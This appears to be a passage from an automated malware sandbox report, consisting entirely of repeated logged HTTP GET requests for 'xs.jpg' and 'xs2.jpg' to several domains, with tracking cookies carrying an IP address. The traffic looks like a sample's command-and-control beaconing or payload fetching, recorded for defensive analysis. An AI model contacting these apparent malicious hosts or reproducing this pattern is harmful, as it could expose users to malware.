        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?58f235fe=2037783532 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159416|1720159260|4|39|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?ea782f73=-1083666855 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?f026a792=-265902190 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?d74bda62=-1365789500 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159419|1720159259|4|40|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3f66d776=-1144003526 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159420|1720159259|4|40|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?ae7223c4=-1178038512 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159420|1720159260|4|40|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?c74c2087=-923187898 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?c94ba6e9=1541600443 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9036add6=1088075608 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159423|1720159259|4|41|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?737daee5=-839468140 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159424|1720159259|4|41|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?215ba763=1119309510 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159424|1720159260|4|41|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?df150ca5=981355486 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?76eabd35=-1523882990 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2896226b=680927851 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159428|1720159259|4|42|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?e8fd1062=1978557004 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159428|1720159259|4|42|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?bb7b9d3b=846387121 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159429|1720159260|4|42|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?35cb7c96=435346908 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?5428f9c6=-1471024244 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9c274079=2103526465 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159432|1720159259|4|43|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?e50bb34e=-227213044 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159432|1720159259|4|43|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?78f5da0c=2029378060 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159433|1720159260|4|43|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?d6d21078=-2072628888 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?91c553b8=1192578784 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3cded4aa=-1441279834 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159436|1720159259|4|44|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?62886082=-988757756 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159437|1720159259|4|44|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?f69d2558=-472420344 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159437|1720159260|4|44|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a4a56c66=-1532662682 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?832f1280=-1987233920 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?54daef13=-24064711 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159441|1720159259|4|45|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?99af4b5=1289201064 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159441|1720159259|4|45|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?da885230=-1257200544 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159442|1720159260|4|45|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a9f1e262=1407435972 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?5829e9af=-1051767432 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?25df21c8=788074048 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159445|1720159259|4|46|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?327e2a9f=-118642122 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159446|1720159259|4|46|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?22eaebd4=-1365861596 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159447|1720159260|4|46|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?7dfe147e=-67360516 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?6f42bef3=181614757 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?80947de5=58389342 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159450|1720159259|4|47|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?48dbc808=-1850241008 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159450|1720159259|4|47|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2c73ccc=186446640 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159451|1720159260|4|47|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?5a80b326=-737830608 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?626616cd=-335646207 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?f260cef5=-685609761 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159454|1720159259|4|48|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?216d3e73=-930122062 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159454|1720159259|4|48|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9e2ac5aa=2024478376 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159455|1720159260|4|48|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?ef46a9a2=-1402908630 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?37f8d56f=1339359386 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?939b7bae=155214274 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159458|1720159259|4|49|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?67316d6f=898910285 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159459|1720159259|4|49|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?baebcf66=1295391228 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159459|1720159260|4|49|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?6582b518=-1852285480 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1b99da6=86825202 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9055f4a9=-1873414999 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159463|1720159259|4|50|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?dbb63107=-575567816 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159463|1720159259|4|50|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?c7d4d608=1993464376 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159464|1720159260|4|50|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?787713d7=1515414323 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?8a282b2c=-954651084 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?b3df36a1=1740533058 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159467|1720159259|4|51|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a62d3528=-1506986712 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159467|1720159259|4|51|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?5f87de0d=2115991604 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159468|1720159260|4|51|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?baaa592=1761595938 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?a5242bcc=-834303444 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9ad6cfae=1905085726 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159471|1720159259|4|52|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?9f1f7a44=-1743041436 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159472|1720159259|4|52|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?ea3b604f=-1460829892 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159472|1720159260|4|52|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3fc8f944=1041285988 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?e4bc5c05=1550460958 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?5eb9eca6=-1116481204 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159476|1720159259|4|53|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?35f32514=1810254376 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159476|1720159259|4|53|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?741b0543=1947927875 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159477|1720159260|4|53|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?f3a2ce17=-2074342170 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
